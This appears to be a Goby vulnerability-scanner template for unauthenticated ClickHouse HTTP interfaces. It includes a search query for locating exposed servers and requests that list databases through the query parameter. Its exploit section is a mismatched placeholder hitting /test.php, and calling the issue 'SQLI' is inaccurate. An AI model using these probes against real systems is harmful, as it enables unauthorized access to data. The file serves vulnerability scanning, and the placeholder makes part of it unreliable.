{
"Name" : "ClickHouse SQLI" ,
"Level" : "3" ,
"Tags" : [
"sqli"
] ,
"GobyQuery" : "banner=\"X-Clickhouse-Summary\" || port=\"8123\"" ,
"Description" : "ClickHouse is an open-source column-oriented DBMS for online analytical processing that allows users to generate analytical reports using SQL queries in real time." ,
"Product" : "ClickHouse" ,
"Homepage" : "https://clickhouse.com/" ,
"Author" : "" ,
"Impact" : "The ClickHouse HTTP interface is exposed without authorization; an attacker can execute arbitrary SQL statements against it and retrieve data." ,
"Recommendation" : "" ,
"References" : [
"https://mp.weixin.qq.com/s/xIc3Ic7N104iTogZul1LJA"
] ,
"HasExp" : true ,
"ExpParams" : null ,
"ExpTips" : {
"Type" : "" ,
"Content" : ""
} ,
"ScanSteps" : [
"AND" ,
{
"Request" : {
"method" : "GET" ,
"uri" : "/ping" ,
"follow_redirect" : false ,
"header" : null ,
"data_type" : "text" ,
"data" : "" ,
"set_variable" : [ ]
} ,
"ResponseTest" : {
"type" : "group" ,
"operation" : "AND" ,
"checks" : [
{
"type" : "item" ,
"variable" : "$code" ,
"operation" : "==" ,
"value" : "200" ,
"bz" : ""
} ,
{
"type" : "item" ,
"variable" : "$head" ,
"operation" : "contains" ,
"value" : "X-Clickhouse-Summary" ,
"bz" : ""
}
]
} ,
"SetVariable" : [
"output|lastbody|regex|"
]
} ,
{
"Request" : {
"method" : "GET" ,
"uri" : "/?query=SHOW%20DATABASES" ,
"follow_redirect" : false ,
"header" : null ,
"data_type" : "text" ,
"data" : "" ,
"set_variable" : [ ]
} ,
"ResponseTest" : {
"type" : "group" ,
"operation" : "AND" ,
"checks" : [
{
"type" : "item" ,
"variable" : "$code" ,
"operation" : "==" ,
"value" : "200" ,
"bz" : ""
} ,
{
"type" : "item" ,
"variable" : "$body" ,
"operation" : "contains" ,
"value" : "default" ,
"bz" : ""
} ,
{
"type" : "item" ,
"variable" : "$body" ,
"operation" : "contains" ,
"value" : "system" ,
"bz" : ""
}
]
} ,
"SetVariable" : [
"output|lastbody|regex|"
]
}
] ,
"ExploitSteps" : [
"AND" ,
{
"Request" : {
"method" : "GET" ,
"uri" : "/test.php" ,
"follow_redirect" : true ,
"header" : null ,
"data_type" : "text" ,
"data" : "" ,
"set_variable" : [ ]
} ,
"ResponseTest" : {
"type" : "group" ,
"operation" : "AND" ,
"checks" : [
{
"type" : "item" ,
"variable" : "$code" ,
"operation" : "==" ,
"value" : "200" ,
"bz" : ""
} ,
{
"type" : "item" ,
"variable" : "$body" ,
"operation" : "contains" ,
"value" : "test" ,
"bz" : ""
}
]
} ,
"SetVariable" : [
"output|lastbody|regex|"
]
}
] ,
"PostTime" : "0000-00-00 00:00:00" ,
"GobyVersion" : "0.0.0"
}